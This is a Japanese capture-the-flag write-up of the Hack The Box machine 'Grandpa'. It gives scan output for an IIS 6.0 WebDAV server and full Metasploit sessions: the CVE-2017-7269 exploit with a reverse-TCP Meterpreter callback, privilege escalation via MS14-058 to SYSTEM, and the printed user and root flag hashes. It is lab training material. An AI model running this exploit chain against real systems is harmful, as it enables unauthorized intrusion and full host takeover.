80番ポートでIIS 6.0が動作している
# nmap -A -n -F -T5 grandpa.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 02:48 UTC Nmap scan report for grandpa.htb (10.10.10.14) Host is up (0.038s latency). Not shown: 99 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Server Type: Microsoft-IIS/6.0 | WebDAV type: Unknown | Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH |_ Server Date: Sun, 23 Aug 2020 02:54:24 GMT Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Timing level 5 (Insane) used No OS matches for host Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows # nmap -T4 --script vuln grandpa.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 02:49 UTC Nmap scan report for grandpa.htb (10.10.10.14) Host is up (0.028s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /postinfo.html: Frontpage file or folder | /_vti_bin/_vti_aut/author.dll: Frontpage file or folder | /_vti_bin/_vti_aut/author.exe: Frontpage file or folder | /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder | /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder | /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder | /_vti_bin/shtml.dll: Frontpage file or folder |_ /_vti_bin/shtml.exe: Frontpage file or folder | http-frontpage-login: | VULNERABLE: | Frontpage extension anonymous login | State: VULNERABLE | Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise. | | References: |_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. Nmap done: 1 IP address (1 host up) scanned in 539.57 seconds # perl nikto.pl -h http://grandpa.htb/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.14 + Target Hostname: grandpa.htb + Target Port: 80 + Start Time: 2020-08-23 02:50:18 (GMT0) --------------------------------------------------------------------------- + Server: Microsoft-IIS/6.0 + Retrieved microsoftofficewebserver header: 5.0_Pub + Retrieved x-powered-by header: ASP.NET + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. + Retrieved x-aspnet-version header: 1.1.4322 + No CGI Directories found (use '-C all' to force check all possible dirs) + Retrieved dasl header: <DAV:sql> + Retrieved dav header: 1, 2 + Retrieved ms-author-via header: MS-FP/4.0,DAV + Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server. + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH + OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server. + OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server. + WebDAV enabled (PROPFIND SEARCH UNLOCK COPY MKCOL LOCK PROPPATCH listed as allowed) + OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/ + OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted. + OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found. + OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information). + OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252. + OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST. + /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found. + 8108 requests: 3 error(s) and 27 item(s) reported on remote host + End Time: 2020-08-23 03:16:32 (GMT0) (1574 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
CVE-2017-7269を起点に調査
[IIS 6.0 exploit]で検索したところ、CVE-2017-7269が目立っていたため、まずはこれを試してみることに。
# msfconsole msf5 > search CVE-2017-7269 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow msf5 > use 0 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl): Name Current Setting Required Description ---- --------------- -------- ----------- MAXPATHLENGTH 60 yes End of physical path brute force MINPATHLENGTH 3 yes Start of physical path brute force Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path of IIS 6 web application VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.17.0.2 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Microsoft Windows Server 2003 R2 SP2 x86 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS grandpa.htb RHOSTS => grandpa.htb msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.21 LHOST => 10.10.14.21 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check [+] 10.10.10.14:80 - The target is vulnerable. msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit [-] Handler failed to bind to 10.10.14.21:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Trying path length 3 to 60 ... [*] Sending stage (176195 bytes) to 172.17.0.1 [*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:52034) at 2020-08-23 04:27:32 +0000 meterpreter > getuid [-] stdapi_sys_config_getuid: Operation failed: Access is denied. meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 272 4 smss.exe 324 272 csrss.exe 348 272 winlogon.exe 396 348 services.exe 408 348 lsass.exe 616 396 svchost.exe 676 396 svchost.exe 740 396 svchost.exe 764 396 svchost.exe 800 396 svchost.exe 936 396 spoolsv.exe 964 396 msdtc.exe 1076 396 cisvc.exe 1116 396 svchost.exe 1176 396 inetinfo.exe 1216 396 svchost.exe 1328 396 VGAuthService.exe 1408 396 vmtoolsd.exe 1456 396 svchost.exe 1600 396 svchost.exe 1700 396 alg.exe 1800 616 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe 1832 348 logon.scr 1912 396 dllhost.exe 2180 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe 2248 616 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe 2304 2180 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe 2404 1076 cidaemon.exe 2416 1076 cidaemon.exe 2460 1076 cidaemon.exe 2484 616 wmiprvse.exe meterpreter > migrate 1800 [*] Migrating from 2304 to 1800... [*] Migration completed successfully. meterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE meterpreter > background [*] Backgrounding session 1...
local_exploit_suggesterを利用して脆弱性を探す
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf5 post(multi/recon/local_exploit_suggester) > exploit [*] 10.10.10.14 - Collecting local exploits for x86/windows... [*] 10.10.10.14 - 34 exploit checks are being tried... [+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed
ms14_058_track_popup_menu を利用して権限を取得する
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu [*] Using configured payload windows/meterpreter/reverse_tcp msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.14.21 LHOST => 10.10.14.21 msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit [-] Handler failed to bind to 10.10.14.21:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Launching notepad to host the exploit... [+] Process 3052 launched. [*] Reflectively injecting the exploit DLL into 3052... [*] Injecting exploit into 3052... [*] Exploit injected. Injecting payload into 3052... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (176195 bytes) to 172.17.0.1 [*] Meterpreter session 2 opened (172.17.0.2:4444 -> 172.17.0.1:43704) at 2020-08-23 04:44:33 +0000 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 2352 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32>type "C:\Documents and Settings\Harry\Desktop\user.txt" type "C:\Documents and Settings\Harry\Desktop\user.txt" bdff5ec67c3cff017f2bedc146a5d869 C:\WINDOWS\system32>type "C:\Documents and Settings\Administrator\Desktop\root.txt" type "C:\Documents and Settings\Administrator\Desktop\root.txt" 9359e905a2c35f861f6a57cecf28bb7b